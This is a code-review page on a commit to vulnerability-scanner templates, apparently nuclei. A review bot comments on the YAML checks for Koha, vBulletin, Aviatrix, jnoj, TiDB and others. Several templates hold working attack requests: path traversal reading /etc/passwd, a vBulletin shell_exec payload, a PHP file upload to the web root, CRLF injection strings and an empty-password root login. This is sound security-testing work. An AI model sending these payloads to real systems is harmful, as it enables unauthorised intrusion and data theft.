- "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
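Review bot: The description names two traversal endpoints, `svc/virtualshelves/search` and `svc/members/search`, but only the first is requested; add the second as another `path` entry. `reference: |` here is a literal block scalar rather than a list; drop the `|`. `cvss-score: 7.50` versus `7.5` in CVE-2013-7240 is cosmetic, but pick one format for the batch.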

View File

@ -0,0 +1,24 @@
id: CVE-2016-4975
info:
name: Apache mod_userdir CRLF injection
author: melbadry9,nadino,xElkomy,sullo
severity: low
description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.
tags: crlf,generic,cves,cve2016
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-4975
cwe-id: CWE-93
requests:
- method: GET
path:
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"
matchers:
- type: regex
regex:
- '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
part: header
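Review bot: The matcher can never match the payload: the request injects `Set-Cookie:crlfinjection` with no value, but the regex requires `crlfinjection=crlfinjection`. Make the payload `%0D%0ASet-Cookie:crlfinjection=crlfinjection` as the generic CRLF templates do, or relax the regex. Tags use `cves` where every other template uses `cve`, so `-tags cve` will skip this one, and there is no `reference:` block at all (at least the NVD entry for CVE-2016-4975 belongs there). The `~user` path also assumes an account literally named `user`; a short payload list of common usernames, or a note about the assumption, would make the check less hit-or-miss.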

View File

@ -1,15 +1,20 @@
id: openssh5.3-detect
id: CVE-2016-6210
info:
name: OpenSSH 5.3 Detection
author: iamthefrogy
severity: low
severity: medium
tags: network,openssh
description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities.
reference:
- http://seclists.org/fulldisclosure/2016/Jul/51
- https://security-tracker.debian.org/tracker/CVE-2016-6210
- http://openwall.com/lists/oss-security/2016/08/01/2
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.9
cve-id: CVE-2016-6210
cwe-id: CWE-200
network:
- host:
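Review bot: The id is now `CVE-2016-6210` but `tags: network,openssh` gained no `cve,cve2016`, so tag-based runs over the cves directory will not include it. The name is still `OpenSSH 5.3 Detection` while CVE-2016-6210 (timing-based username enumeration) affects OpenSSH before 7.3, not 5.3 specifically; if the network check is a banner match on 5.3 the name should say it flags one affected version, and `description` should state that the check is a version match rather than a timing probe, otherwise users will read a clean result as "not vulnerable" for 6.x and 7.0-7.2 hosts.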

View File

@ -0,0 +1,36 @@
id: CVE-2018-0127
info:
name: Cisco RV132W and RV134W Router Information Disclosure
author: jrolf
severity: critical
description: A vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device, which could lead to the disclosure of confidential information.
tags: cve,cve2018,cisco,router
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-0127
cwe-id: CWE-306
reference:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2
- http://www.securitytracker.com/id/1040345
- http://www.securityfocus.com/bid/102969
requests:
- method: GET
path:
- "{{BaseURL}}/dumpmdm.cmd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Dump"
- "MDM"
- "cisco"
- "admin"
part: body
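Review bot: The `word` matcher lists four entries but no `condition: and`, so the default `or` fires on any 200 page containing `admin` or `cisco`, which turns a critical-severity template into a false-positive generator on every Cisco login page. Add `condition: and` (the tugboat template later in this commit does exactly that), or match on a string specific to the `dumpmdm.cmd` output rather than on `admin`.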

View File

@ -1,10 +1,10 @@
id: CVE-2019-16759
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
name: RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author: madrobot
severity: critical
reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/
tags: cve,cve2019,vbulletin,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
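Review bot: The reference swap replaces the original write-up with a Trustwave post whose URL is about CVE-2020-7373, the later bypass of this fix, so the CVE-2019-16759 template now cites only the follow-on CVE. Keep a reference for the 2019 issue itself (the NVD entry for CVE-2019-16759 or the original full-disclosure post) next to it. Dropping `0day` from the name is right; it stopped being one in 2019.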
@ -17,6 +17,7 @@ requests:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();

View File

@ -1,6 +1,6 @@
id: CVE-2019-17538
info:
name: Jnoj Directory Traversal for file reading(LFI)
name: Jnoj arbitrary local file inclusion (LFI)
author: pussycat0x
severity: high
reference: https://github.com/shi-yang/jnoj/issues/53
@ -11,11 +11,12 @@ info:
cvss-score: 7.50
cve-id: CVE-2019-17538
cwe-id: CWE-22
description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has Directory Traversal for file reading via the web/polygon/problem/viewfile?id=1&name=../ substring."
description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has directory traversal (LFI) vulnerability via web/polygon/problem/viewfile?id=1&name=../"
requests:
- raw:
- |
GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
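Review bot: The raw request hardcodes a `/jnoj/` prefix (`GET /jnoj/web/polygon/problem/viewfile?...`), so a jnoj deployed at the web root or under any other path is missed; `{{BaseURL}}/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd` with `method: GET` follows the other templates and lets the user supply the prefix. The `Content-Type: application/x-www-form-urlencoded` header on a body-less GET is dead weight. Adding `Host: {{Hostname}}` is the right fix for the raw request.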

View File

@ -1,11 +1,17 @@
id: simple-employee-rce
id: CVE-2019-20183
info:
name: Simple Employee Records System 1.0 RCE
name: Simple Employee Records System 1.0 arbitrary file upload
description: Simple Employee Records System 1.0 contains an arbitrary file upload due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or RCE.
author: pikpikcu
severity: critical
severity: high
reference: https://www.exploit-db.com/exploits/49596
tags: rce,intrusive
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cwe-id: CWE-434
cve-id: CVE-2019-20183
tags: rce,intrusive,cve,upload,cve2019
requests:
- raw:

View File

@ -5,7 +5,7 @@ info:
severity: critical
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
description: |
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
vBulletin 5.5.4 through 5.6.2 allow remote command execution (RCE) via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
tags: cve,cve2020,vbulletin,rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
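Review bot: The description edit changes `allows` to `allow`; `vBulletin 5.5.4 through 5.6.2` is one product range and NVD's wording is `allows`, so the original verb was correct. Adding `(RCE)` is fine.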
@ -17,6 +17,7 @@ requests:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;"
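Review bot: The POST body ends with an unbalanced `"` after `exit;`, which is sent to the server as part of the injected PHP (`... exit;"`); it looks like a leftover from quoting the payload and should go unless it is deliberately relied on. The `Host: {{Hostname}}` addition is correct.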

View File

@ -0,0 +1,43 @@
id: CVE-2021-40870
info:
name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE
author: pikpikcu
severity: critical
description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
reference:
- https://wearetradecraft.com/advisories/tc-2021-0002/
- https://nvd.nist.gov/vuln/detail/CVE-2021-40870
tags: cve,cve2021,rce,aviatrix
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-40870
cwe-id: CWE-434
requests:
- raw:
- |
POST /v1/backend1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=HACKERMAN<?php phpinfo()?>
- |
GET /v1/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'HACKERMAN'
- "PHP Extension"
- "PHP Version"
condition: and
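Review bot: This template writes `{{randstr}}.php` containing `<?php phpinfo()?>` into the target's web root and never removes it, yet the tags are only `cve,cve2021,rce,aviatrix`; add `intrusive` (as CVE-2019-20183 in this commit does for its upload) so users running with default filters are not dropping executable files on production controllers. A marker-only payload (`HACKERMAN` is already matched) would prove the write without dumping the server's environment into scan output; `phpinfo()` is more than the check needs.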

View File

@ -0,0 +1,27 @@
id: CVE-2021-40960
info:
name: Galera WebTemplate 1.0 Directory Traversal
author: daffainfo
severity: high
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
reference:
- http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960
tags: cve,cve2021,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
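Review bot: The path hardcodes `/GallerySite/filesrc/fotoilan/388/middle//`, and `388` is an item id lifted from the PoC; if the handler rejects ids that do not exist, the check only fires on the one site the PoC was written against. Either state the assumption in `description` or try a small payload list of ids. The double-encoded `.%252e` segments are the point of the bypass and deserve a sentence in `description` as well, since the NVD text only says "directory traversal".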

View File

@ -0,0 +1,30 @@
id: CVE-2021-41381
info:
name: Payara Micro Community 5.2021.6 Directory Traversal
author: pikpikcu
severity: medium
description: Payara Micro Community 5.2021.6 and below allows Directory Traversal
reference:
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
- https://nvd.nist.gov/vuln/detail/CVE-2021-41381
tags: cve,cve2021,payara,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-41381
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"
matchers-condition: and
matchers:
- type: word
words:
- "payara.security.openid.default.providerURI="
- "payara.security.openid.sessionScopedConfiguration=true"
condition: and
part: body
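Review bot: The matcher requires two specific property lines (`payara.security.openid.default.providerURI=` and `payara.security.openid.sessionScopedConfiguration=true`) that belong to the deployed application's `microprofile-config.properties`, not to Payara Micro itself, so the template only fires on deployments that happen to ship that OpenID configuration; any other app on a vulnerable Payara returns the file with different content and is reported clean. Match on something every served `WEB-INF` file reveals, or at least add a `status` matcher and say in `description` which application fingerprint is assumed.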

View File

@ -0,0 +1,17 @@
id: samba-swat-panel
info:
name: Samba SWAT panel
author: PR3R00T
severity: info
tags: panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- 'Basic realm="SWAT"'
part: header
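Review bot: the info block has neither `description` nor `reference`, unlike the other templates added in this commit; add a one-line description explaining that the match keys on the HTTP Basic realm `"SWAT"` in the response headers, so the finding is self-explanatory in scan output.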

View File

@ -0,0 +1,33 @@
id: tugboat-config-exposure
info:
name: Tugboat configuration file exposure
description: Tugboat is a command line tool for interacting with your DigitalOcean droplets.
reference: https://github.com/petems/tugboat
author: geeknik
severity: critical
tags: tugboat,config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.tugboat"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "authentication"
- "access_token"
- "ssh_user"
condition: and
extractors:
- type: regex
part: body
regex:
- 'access_token: .*'
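Review bot: the extractor `'access_token: .*'` copies the full DigitalOcean access token into nuclei results, turning scan output files into a store of live credentials. The word matcher already confirms the exposure (`authentication`, `access_token`, `ssh_user` all present), so either drop the extractor or narrow the capture group so only a short prefix of the token is recorded.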

View File

@ -0,0 +1,17 @@
id: amazon-sns-token
info:
name: Amazon SNS Token Detect
author: TheBinitGhimire
severity: info
tags: file,token,amazon,aws
file:
- extensions:
- all
extractors:
- type: regex
name: amazon-sns-topic
regex:
- 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'
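Review bot: the regex matches SNS topic ARNs (`arn:aws:sns:<region>:<account-id>:<topic>`), which are resource identifiers rather than credentials, and the extractor is even named `amazon-sns-topic`; the template `name: Amazon SNS Token Detect` and the `token` tag are therefore misleading. Rename to something like "Amazon SNS Topic ARN Detect", adjust the tags, and add a `description` saying the finding is an exposed topic ARN / account ID, not a secret.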

View File

@ -105,15 +105,21 @@ file:
regex:
- 'import_request_variables'
- type: regex
# Avoid use of $GLOBALS
# Avoid use of GLOBALS
regex:
- '\\$GLOBALS'
- 'GLOBALS'
- type: regex
regex:
- '\\$_GET'
- '_GET'
- type: regex
regex:
- '\\$_POST'
- '_POST'
- type: regex
regex:
- '_COOKIE'
- type: regex
regex:
- '_SESSION'
- type: regex
# Ensure the use of type checking validating against booleans (===)
regex:
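Review bot: the original patterns `'\\$GLOBALS'`, `'\\$_GET'` and `'\\$_POST'` were indeed broken: in a single-quoted YAML scalar the backslashes are literal, so the regex became `\\$GLOBALS` (a literal backslash, then an end-of-text anchor, then text), which can never match. The replacement drops the dollar sign altogether, though, so `'GLOBALS'`, `'_GET'`, `'_POST'`, `'_COOKIE'` and `'_SESSION'` now also hit comments, strings and unrelated identifiers containing those substrings. The intended fix is a single backslash, e.g. `'\$GLOBALS'` and `'\$_GET'`, which yields the regex `\$GLOBALS` and matches the superglobal itself; the comment should then go back to `# Avoid use of $GLOBALS`.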
@ -206,7 +212,7 @@ file:
- type: regex
# MySQLi Extension
regex:
- "mysqli((_real)?_connect)?"
- "mysqli((_real)?_connect)?|_query"
- type: regex
# Oracle OCI8 DBMS
regex:
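Review bot: in `"mysqli((_real)?_connect)?|_query"` the alternation binds loosest, so the pattern is `mysqli((_real)?_connect)?` OR `_query`, and the new branch fires on any `_query` substring (`pg_query`, `db_query`, `my_query`) rather than on `mysqli_query`. If the intent is to add `mysqli_query` to the MySQLi check, keep the alternation inside the group: `"mysqli((_real)?_connect|_query)?"`.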
@ -243,3 +249,10 @@ file:
# XML document
regex:
- "x(ptr|path)_new_context"
- type: regex
# Investigate if GetTableFields is called safely
regex:
- "GetTableFields"
- type: regex
regex:
- "ini_get.*magic_quotes_gpc.*"
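Review bot: the last regex entry `"ini_get.*magic_quotes_gpc.*"` has no explanatory comment, while every neighbouring entry in this file does (`# MySQLi Extension`, `# XML document`, `# Investigate if GetTableFields is called safely`); add one stating what it flags, i.e. code that still branches on the removed `magic_quotes_gpc` setting. The trailing `.*` matches nothing extra and can be dropped.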

View File

@ -5,18 +5,21 @@ info:
author: xElkomy
severity: high
reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
description: The PUT method is enabled on the web server, allowing for arbitrary file uploads.
tags: injection
requests:
- raw:
- |
PUT /testing-put.txt HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
{{randstr}}
- |
GET /testing-put.txt HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
req-condition: true
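Review bot: `tags: injection` misdescribes the finding; the new description itself says the issue is that the PUT method is enabled on the server, which is a misconfiguration, so a misconfiguration-style tag fits better. Also, the PUT request creates `/testing-put.txt` on the target and nothing in the hunk deletes it; mention in the description that a marker file containing `{{randstr}}` is left behind so operators know to remove it.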

network/tidb-unauth.yaml (Normal file, 28 lines)
View File

@ -0,0 +1,28 @@
id: tidb-unauth
info:
name: Unauth TiDB Disclosure
author: lu4nx
severity: high
metadata:
zoomeye-dork: tidb +port:"4000"
tags: network,tidb
network:
- inputs:
- read: 1024 # skip handshake packet
- data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication
type: hex
host:
- "{{Hostname}}"
- "{{Hostname}}:4000"
read-size: 1024
matchers:
- type: binary
binary:
# resp format:
# 07: length, 02: sequence number, 00: success
- "0700000200000002000000"
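Review bot: the hex `data:` line is documented only as `# authentication`, but its content is what a reviewer needs to verify: it decodes to a MySQL-protocol handshake response for user `root` (`726f6f7400`) with a zero-length auth-response, i.e. an empty password, and the `mysql_native_password` plugin (`6d7973716c5f6e61746976655f70617373776f726400`). Spell that out in the comment and in a `description:` (the info block has none), so "Unauth" is understood as "root with empty password accepted"; note too that the fixed payload only works because an empty password needs no salt from the handshake packet that `read: 1024` skips, and the `0700000200000002000000` OK packet is the success signal.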

View File

@ -0,0 +1,24 @@
id: aviatrix-detect
info:
name: Aviatrix Detect
author: pikpikcu
severity: info
tags: tech,aviatrix
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Aviatrix Controller</title>"
- type: status
status:
- 200

View File

@ -0,0 +1,71 @@
id: csrf-guard-detect
info:
name: OWASP CSRF Guard detection
author: forgedhallpass
severity: info
description: Detects OWASP CSRF Guard 3.x & 4.x versions and whether token-per-page support is enabled based on default configuration.
reference: https://github.com/OWASP/www-project-csrfguard
tags: tech,csrfguard
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /JavaScriptServlet HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
- |
POST /JavaScriptServlet HTTP/1.1
Host: {{Hostname}}
OWASP-CSRFTOKEN: {{masterToken}}
matchers-condition: or
matchers:
- type: word
name: "CSRFGuard-v3.x"
words:
- "FETCH-CSRF-TOKEN"
- type: word
name: "CSRFGuard-v4.x"
words:
- "masterTokenValue"
- type: dsl
name: "Disabled-token-per-page"
condition: and
dsl:
- 'status_code_3==400'
- 'contains(body, "Token-Per-Page functionality is disabled")'
- type: dsl
name: "Enabled-token-per-page"
condition: and
dsl:
- 'status_code_3==200'
- 'contains(body, "{\"pageTokens")'
cookie-reuse: true
extractors:
- type: regex
name: masterToken
internal: true
group: 1
regex:
- "(?:masterTokenValue\\s*=\\s*')([^']+)';"
- type: regex
group: 1
name: "master-token"
regex:
- "(?:masterTokenValue\\s*=\\s*')([^']+)';"
- type: json
name: "page-token"
json:
- '.pageTokens'
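Review bot: the two regex extractors carry the identical pattern `"(?:masterTokenValue\\s*=\\s*')([^']+)';"`; the first is `internal: true` so `{{masterToken}}` can feed the third request, while the second (`master-token`) writes the same CSRF master token into scan output. For a `severity: info` detection template consider dropping the non-internal copy so per-session CSRF tokens do not end up in result files; if the output is intentional, add a comment saying that `internal: true` suppresses output and that is why the pattern appears twice. Also, `cookie-reuse: true` sits between `matchers` and `extractors`; moving it next to `raw:` makes it easier to see that the three requests share a session.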

View File

@ -0,0 +1,31 @@
id: fatpipe-mpvpn-detect
info:
name: FatPipe MPVPN Detect
author: princechaddha
severity: info
tags: tech,fatpipe
requests:
- method: GET
path:
- "{{BaseURL}}/fpui/jsp/login.jsp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>FatPipe MPVPN&nbsp;| Log in</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<h5>([0-9.a-z]+)<\/h5>'

View File

@ -0,0 +1,31 @@
id: fatpipe-warp-detect
info:
name: FatPipe WARP Detect
author: princechaddha
severity: info
tags: tech,fatpipe
requests:
- method: GET
path:
- "{{BaseURL}}/fpui/jsp/login.jsp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>FatPipe WARP&nbsp;| Log in</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<h5>([0-9.a-z]+)<\/h5>'
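Review bot: fatpipe-warp-detect and fatpipe-mpvpn-detect are identical apart from the word in the `<title>` match (`FatPipe WARP` vs `FatPipe MPVPN`) and share the same path and version extractor; one template with two named word matchers under `matchers-condition: or` (plus the status check) would halve the maintenance surface and still report which product was seen. Minor: `<\/h5>` needs no escaping inside a single-quoted scalar, `<h5>([0-9.a-z]+)</h5>` is equivalent.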

File diff suppressed because it is too large

View File

@ -0,0 +1,24 @@
id: hp-media-vault-detect
info:
name: HP Media Vault Detect
author: pussycat0x
severity: info
metadata:
fofa-dork: 'app="HP-Media-Vault-Media-Server"'
tags: tech,hp
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- "<title>HP Media Vault"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,63 @@
id: vmware-version-detect
info:
name: vmware-version-detect
author: elouhi
severity: info
description: Sends a POST request containing a SOAP payload to a vCenter server to obtain version information
reference:
- https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/
- https://svn.nmap.org/nmap/scripts/vmware-version.nse
tags: tech,vcenter,vmware
requests:
- raw:
- |
POST /sdk/ HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soap:Header>
<operationID>00000001-00000001</operationID>
</soap:Header>
<soap:Body>
<RetrieveServiceContent xmlns="urn:internalvim25">
<_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
</RetrieveServiceContent>
</soap:Body>
</soap:Envelope>
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'ha-folder-root'
- 'RetrieveServiceContentResponse'
- type: word
words:
- "text/xml"
part: header
extractors:
- type: regex
part: body
group: 1
regex:
- "<name>(.*?)</name>"
- "<version>(.*?)</version>"
- "<build>(.*?)</build>"
- "<osType>(.*?)</osType>"
- "<productLineId>(.*?)</productLineId>"
- "<apiType>(.*?)</apiType>"
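Review bot: the raw request carries browser-style `User-Agent`, `Accept` and `Accept-Language` headers but no `Content-Type: text/xml` for the SOAP body, even though the matcher expects `text/xml` in the response; set the content type and drop the browser headers, which add nothing to a `RetrieveServiceContent` call. Also `name: vmware-version-detect` merely repeats the `id`; the other tech templates in this commit use readable names ("Aviatrix Detect", "FatPipe WARP Detect"), so something like "VMware vCenter Version Detect" would match the convention.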

View File

@ -0,0 +1,23 @@
id: yzmcms-detect
info:
name: YzmCMS Detect
author: pikpikcu
severity: info
tags: yzmcms,tech
requests:
- method: GET
path:
- '{{BaseURL}}/admin/index/login.html'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'Powered By <a href="http://www.yzmcms.com"'

View File

@ -16,7 +16,6 @@ requests:
- "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection"
- "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache
- "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975
- "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%
0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
- "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
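Review bot: in the long parameter-spray path the segment `&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection` leaves `redirectUri` without a value, so that parameter is never actually tested; it should read `&redirectUri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUrl=...` like every other entry. Worth a quick scan of the rest of the line for the same slip, since a single missing `=` is invisible in a path this long.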

View File

@ -0,0 +1,47 @@
id: oob-header-based-interaction
info:
name: Header Based Generic OOB Interaction
author: pdteam
severity: info
description: The remote server fetched a spoofed URL from the request headers.
reference: https://github.com/PortSwigger/collaborator-everywhere
tags: oob,ssrf,generic
requests:
